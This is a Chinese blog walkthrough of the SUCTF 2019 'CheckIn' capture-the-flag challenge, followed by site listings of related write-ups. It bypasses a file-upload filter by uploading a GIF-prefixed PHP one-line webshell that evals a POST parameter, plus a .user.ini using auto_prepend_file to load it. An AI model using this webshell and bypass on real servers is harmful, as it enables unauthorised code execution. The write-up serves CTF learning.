[SUCTF 2019]CheckIn

最新推荐文章于 2024-06-08 16:45:19 发布
最新推荐文章于 2024-06-08 16:45:19 发布
阅读量169 收藏
点赞数
分类专栏: wp 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55234680/article/details/120923099
版权

打开题目,常规的文件上传
经过各种上传测试,似乎在后端有文件后缀检测且难以绕过
但可以上传.user.ini文件,且上传文件成功后会主动给出路径,而这个路径下恰好有一个php文件

上传木马

GIF8a
<script language='php'>@eval($_POST['door']);</script>

得到木马路径

Your dir uploads/0e2baa5f405a4e8f1b40ce791fae880a
Your files :
array(4) { [0]=> string(1) “.” [1]=> string(2) “…” [2]=> string(5) “a.jpg” [3]=> string(9) “index.php” }

上传.user.ini

GIF8a
auto_prepend_file=../0e2baa5f405a4e8f1b40ce791fae880a/a.jpg

Your dir uploads/22a34919097cc74b924bf5ac06da8b89
Your files :
array(4) { [0]=> string(1) “.” [1]=> string(2) “…” [2]=> string(9) “.user.ini” [3]=> string(9) “index.php” }

蚁剑连接即可

d0ud
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
glados_checkin
03-25
glados定时签到
[SUCTF 2019] CheckIn 1
feng的博客
10-22 1162
知识点 上传.user.ini文件,条件如下: (1)服务器脚本语言为PHP (2)对应目录下面有可执行的php文件 (3)服务器使用CGI/FastCGI模式 现在大部分网站都是用的fastcgi,这个东西我理解的是可以提供web服务器的一种api,而apache/nginx/iis这些服务器都会依靠这种api来运行 而在服务器以fastcgi启动运行的时候,.user.ini也是php的一种配置文件,众所周知php.ini是php的配置文件,它可以做到显示报错,导入扩展,文件解析,web站点路径等等设置
SUCTF2019 CheckIn
segogt的博客
11-28 652
对文件后缀的黑名单匹配 通过上传配置文件.user.ini绕过 .user.ini auto_prepend_file:指定的文件能够在主文件执行前自动被解析。 auto_append_file:指定的文件的内容在主文件执行后自动被解析 如果php脚本使用了exit()中断退出,auto_append_file就不会被执行 于是可以通过上传.user.ini,然后再上传一个指定的文件,文件...
[SUCTF 2019]CheckIn1
最新发布
m0_73673698的博客
06-08 175
利用上传的一句话进行GET传参cmd=var_dump(scandir('/'));看到upload页面猜测文件上传,随便传了一个txt,给提示not image!读取一个图像的第一个字节并检查其签名。用蚁剑连不上(orz)
[SUCTF 2019] Check In 1
c1516175954的博客
03-02 278
[SUCTF 2019]CheckIn1源码审计
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
[SUCTF 2019]CheckIn 1
qq_49422880的博客
06-12 160
文件上传漏洞 今天不讲题解,讲原理,碰到文件上传漏洞,其实已经做了很多的题目,但是发现对于其中的两个配置文件不是特别饿熟悉,特写此文学习记录。     .htaccess漏洞 可以让我们上传文件时可以通过修改服务器的配置文件,可以让服务器对我们上传的文件产生错误的解析,所以在上传文件的时候如果上传不成功,或则格式不正确,可以试试修改.htaccess文件,然后上传修改的方式。 <Directory /> Options FollowSymLinks AllowOverride A
[SUCTF 2019]CheckIn 1
m0_51426816的博客
03-12 262
查看GitHub中的源码 <?php // error_reporting(0); $userdir = "uploads/" . md5($_SERVER["REMOTE_ADDR"]); if (!file_exists($userdir)) { mkdir($userdir, 0777, true); } file_put_contents($userdir . "/index.php", ""); if (isset($_POST["upload"])) { $tmp_name
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值